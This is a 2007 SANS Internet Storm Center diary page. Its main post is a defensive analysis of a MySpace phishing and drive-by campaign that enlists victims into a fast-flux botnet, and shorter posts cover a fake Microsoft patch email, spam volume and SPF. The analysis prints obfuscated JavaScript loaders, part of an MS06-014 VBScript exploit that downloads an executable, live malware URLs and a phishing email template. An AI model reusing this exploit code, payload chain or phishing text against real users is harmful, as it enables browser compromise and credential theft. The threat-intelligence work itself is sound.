Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2007-06-26 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

MySpace Phish and Drive-by attack vector propagating Fast Flux network growth

Published: 2007-06-26
Last Updated: 2007-06-29 23:14:38 UTC
by Johannes Ullrich (Version: 3)
0 comment(s)

UPDATE: Skip down to Section 2007-06-28

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "Fast-Flux") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

A typical excerpt from an infected profile (obfuscated to protect the innocent):

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusa nbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>

The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:
<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c .com/header_03.gif" width=1
height=1></iframe>

    The domain used here is of course again served via flux. header_03.gif

<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>



   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
(Warning: live malware URLs visit at your own risk)

http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

http://fcs.camgenie .com/weby7.exe

Settings for the bot can be found here:
http://settings.iconnectyou .biz

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:
AS13767   | 72.232.254.218 
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86    
AS25761   | 72.20.6.10   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team. 

UPDATE!  2007-06-28

MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

Two primary infection vectors have been observed providing us with unique insight into the life cycle involved in propagating a fast flux service network.  The attack vectors include:

  • Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
  • SWF Flash image malicious redirection to Phishing and drive-by browser exploit attempt.

All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com    (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )

$ GET http://www.e44 7aa2.com

<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" />
</HEAD>
</HTML>

(The above URL is only a single example of potentially infinite permutations)

By following the above /da3e/index.php link results in a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="
../.footer_01.gif" width=0 height=0></iframe>

 The IFrame rendered /.footer_01.gif (not an actual gif but instead an encoded/obfuscated JavaScript snippet)

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 The decoded result of the above /.footer_01.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>

 The IFrame rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74

REMOVED

?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%

REMOVED

dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 For which the decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>

Following the IFrame rendered /routine.php file results in another JavaScript encoded/obfuscated file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>        

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>

<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("

REMOVED

"));
</SCRIPT>
</body>
</html>

The decoded result of  /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>

<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0  Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "
GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>

The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe) that is then responsible for attempting to download additional malicious components necessary for integration of new compromised hosts into a fast flux service network.

The malware stub (session.exe) above attempts to download and execute the following components:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe

Now back to these Evil Flash File Redirects:

What follows is just a representative sampling of URLs for imageshack.us site hosted flash files which perform one simple action, an action-script based browser redirect to a fast flux service network hosted combination phishing and drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).

All files are exactly the same based on same md5 and sha1 hash for all files:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

Imageshack HTTP Server maintained mtime suggest a deployment time of 2007-06-05 03:56:30-0700

Decompiling a flash component results in the discovery of that terrible redirect:

$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate:
120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                 (   24 bytes) action: GetUrl URL:"
http://www.e447 aa2.com" Label:""
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (
00:00:00,000)
[000]         0 END
 

Where in the world are Flash files like the above being hosted?

http://img116.imagesh ack.us/img116/1299/97231039qx0.swf
http://img116.imagesh ack.us/img116/1424/81562934sa1.swf
http://img116.imagesh ack.us/img116/1699/63088115dg4.swf

REMOVED >100 URLS ( You get the idea )

http://img527.imagesh ack.us/img527/9186/77432798oc4.swf
http://img527.imagesh ack.us/img527/9573/87356429cb0.swf
http://img527.imagesh ack.us/img527/9696/66658005sg8.swf
http://img527.imagesh ack.us/img527/9828/13582837lk5.swf

Several Hundred MySpace profiles were discovered injected with links to phishing, and it is easy to imagine that many more were affected.

home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com

HUNDREDS OF URLS REMOVED

home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com

Flux!  It's SO easy to miss!

This write up is not geared to address the more complex overview of what a fast flux service network is (but is forthcoming).  Essentially all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream Mothership host. 

;; ANSWER SECTION:
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]

Check back on the above DNS results, the same goes for any domains referenced above.

The concept of Flux may unfold before very your eyes.
;; AUTHORITY SECTION:
at6pyss.com.            172799  IN      NS      ns1.welcometothechallenge.hk.
at6pyss.com.            172799  IN      NS      ns1.kanjerida.hk.
at6pyss.com.            172799  IN      NS      ns1.phudisarida.hk.
at6pyss.com.            172799  IN      NS      ns1.myheroisyourslove.hk.
 

 

Keywords:
0 comment(s)

FAKE Microsoft patch email -> Fake Spyware Doctor!

Published: 2007-06-26
Last Updated: 2007-06-28 20:03:11 UTC
by donald smith (Version: 4)
0 comment(s)

Several of our readers reported an email that lead to a fake Microsoft patch being spammed on the net today. The email had their full names and in one case the company they worked for included in the body of the email. So far I have seen 4 different urls. We are working on getting the systems hosting the malware cleaned or shutdown. We have submitted the malware itself to most of the AV vendors so detection should improve but currently it is not detected.

Thanks go out to PatrickC, TroyP, NathanM, BruceD and CalebC.

You can see in the body of the email below that the spelling is bad and the license key is not in the right format for XP nor Outlook.

Microsoft pointed us to a couple of web pages they maintain that should help you recognize fraudulent email here and here

One of the submitters “PatrickC” provided the following email for a fake Microsoft patch and malware site.  

“The following email I received is new to me. The URL points to
hxxp://fake.microsoft.site./
MSOUTRC2007Update-KB863892.exe
Bye.”
==Sanitized email header==============
X-Envelope-To: <patrick >
<SNIP to protect Patrick >
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick 
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>
X-Antivirus: avast! (VPS 000752-0, 2007-06-25), Inbound message
X-Antivirus-Status: Clean 
Microsoft.com Home |
| Windows Family | Windows Marketplace | Office Family | Microsoft Update  
Dear Patrick

You are receiving this message because you are using Genuine Microsoft Software and your e-mail address has been subscribed to the Microsoft Windows Update mailing list.

A new 0-day vulnerability has appeared in the wild and was reported for the first time Monday, June 18th. The vulnerability affects machines running MICROSOFT OUTLOOK and allows an attacker to take full control of the vulnerable computer if the exploitation process is succesfull.

Since then, more than 100,000 machines have been reported as exploited and used to promote spammy pharmacy products such as viagra and cialis.

An update has been released to fix this issue and can be downloaded from the following link :

http://windowsupdate.microsoft.com/outlook/upd ate-0-day/download.aspx?id=63852

Quick Details
File Name: MSOUTRC2007Update-KB863892.exe
Version: 3.1.1023
Date Published: 06/25/2007
Download Size: 20 Kb
Estimated Download Time: 1 sec

It's urgent to download and install the update as soon as possible in order to decrease the number of succesfull attacks that occure each day. The update is only available for Genuine Versions of Microsoft Outllok. 
Instructions :  
1. Click the link above to start the download
2. Save the update in your WINDOWS directory and run it from there.If you want to start the installation immediately click Run in the download box, after you click the link.
3. After you run it, the update will download the security packages required to patch Microsoft Outlook.The entire process will take around 10-15 minutes, and you'll receive a confirmation message once the update process is completed.

Your Microsoft Windows Licence Information is :

REG ISTERED TO : Patrick
Licence KEY : XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

Thank you

Microsoft Corp.

=====================================

From Norman Sandbox:

MSOUTRC2007Update-KB863892.exe : INFECTED with W32/Malware (Signature: NO_VIRUS)

 [ DetectionInfo ]
    * Sandbox name: W32/Malware
    * Signature name: NO_VIRUS
 [ General information ]
    * Drops files in %WINSYS% folder.
    * File length:        20480 bytes.
    * MD5 hash: c7a8bde380043b5d8d7229e82db1c2fc.
 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\sdoctor.exe.
    * Creates file C:\france.html.
    * Deletes file c:\france.html.
 [ Changes to registry ]
    * Creates value "SpywareDoctor"="C:\WINDOWS\SYSTEM32\sdoctor.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
 [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).
    * Attemps to NULL C:\COMMAND.COM /c del c:\sample.exe >> NUL.
    * Modifies other process memory.
    * Creates a remote thread.
[ Signature Scanning ]
    * C:\WINDOWS\SYSTEM32\sdoctor.exe (20480 bytes) : no signature detection.

We notified one of the support teams at a hosting provider that a virus was found on one of their customers systems.

Their auto responder responded within a minute.
A support person removed the malware and responded within 30 minutes.
When I tried to verify that I found the malware was still there or back.
When I notified the hosting provider that the malware was back the support person analysised logs, determined it was being uploaded via ftp and immediately disabled the ftp account involved.

 

One of our readers provided this detection list.

AntiVir             HEUR/Crypted
Avast!              --
AVG                 Downloader.Agent.MPF
A-Squared           --
Bitdefender         Trojan.Downloader.Small.AABU
ClamAV              --
Command AV          W32/Warezov.gen3!W32DL
Dr Web              Trojan.DownLoader.24763
eSafe               --
eTrust              Win32/Smynoc
Ewido               --
F-Prot              W32/Warezov.gen3!W32DL
F-Secure            Trojan-Downloader.Win32.Agent.bvy
Fortinet            W32/Agent.BVY!tr.dldr
Ikarus              --
Kaspersky           Trojan-Downloader.Win32.Agent.bvy
McAfee              Generic Downloader.ak trojan
Microsoft           Trojan:Win32/Agent.gen!C
Nod32               Win32/TrojanDownloader.Agent.ACS
Norman              W32/Malware (Sandbox)
Panda               Suspicious file
QuickHeal           --
Rising AV           --
Sophos              Mal/Behav-112
Spybot S&D          Smitfraud-C.,,Installer
Symantec            -- (BETA: Downloader)
Trend Micro         -- (BETA: TROJ_AGENT.VII)
VBA32               --
VirusBuster         --
WebWasher           Heuristic.Crypted

 

UPDATE:
 Several users have reported that this is only being sent to IT accounts and mostly highlevel IT accounts.

There is a new version of the binary.

MD5 = 0b4a130e2f124e780947fc4a36e0a556

They changed the name of the binary and registry entries.

systemmechanic.exe
SystemMechanic

Keywords:
0 comment(s)

Microsoft Re-Releases MS07-022

Published: 2007-06-26
Last Updated: 2007-06-26 19:25:09 UTC
by Scott Fendley (Version: 1)
0 comment(s)

On June 26th 2007,  Microsoft re-released the  MS07-022 update for Windows 2000 SP4.  This update addresses some problems related to the NEC 98 hardware.  For more information related to the issues, please see http://support.microsoft.com/kb/931784/.

Keywords:
0 comment(s)

Spam volume

Published: 2007-06-26
Last Updated: 2007-06-26 01:28:58 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Today, Robert reported that he is seeing a higher then normal spam volume. We do get notes like this rather regularly. Usually, its just a matter of "your turn coming up" in the global spam game. Here a few URLs I use to check on the global spam volume:

Spamcop http://spamcop.net/spamgraph.shtml?spamstats

Messagelabs: http://www.messagelabs.com/intelligence.asp

Postini: http://www.postini.com/stats

Keywords:
0 comment(s)

Preventing spoofed internal e-mail

Published: 2007-06-26
Last Updated: 2007-06-26 01:16:20 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Nick submitted a nice piece of malware we are currently looking at. The malware itself includes a nice rootkit that doesn't appear to be detected with common rootkit tools. However, in my opinion, the delivery method was noteworthy. It used a spoofed internal sender. This made me wonder what's the best way to block e-mail that comes from outside mail servers, but claims an internal "From:" header.

My first guess would be that this is a great reason to enable SPF. Will this work?  I am assuming that it is a standard policy to require employees to use a VPN connection or "something like that" to send e-mail using an internal mail server.

Any other ideas?

Keywords:
0 comment(s)
Diary Archives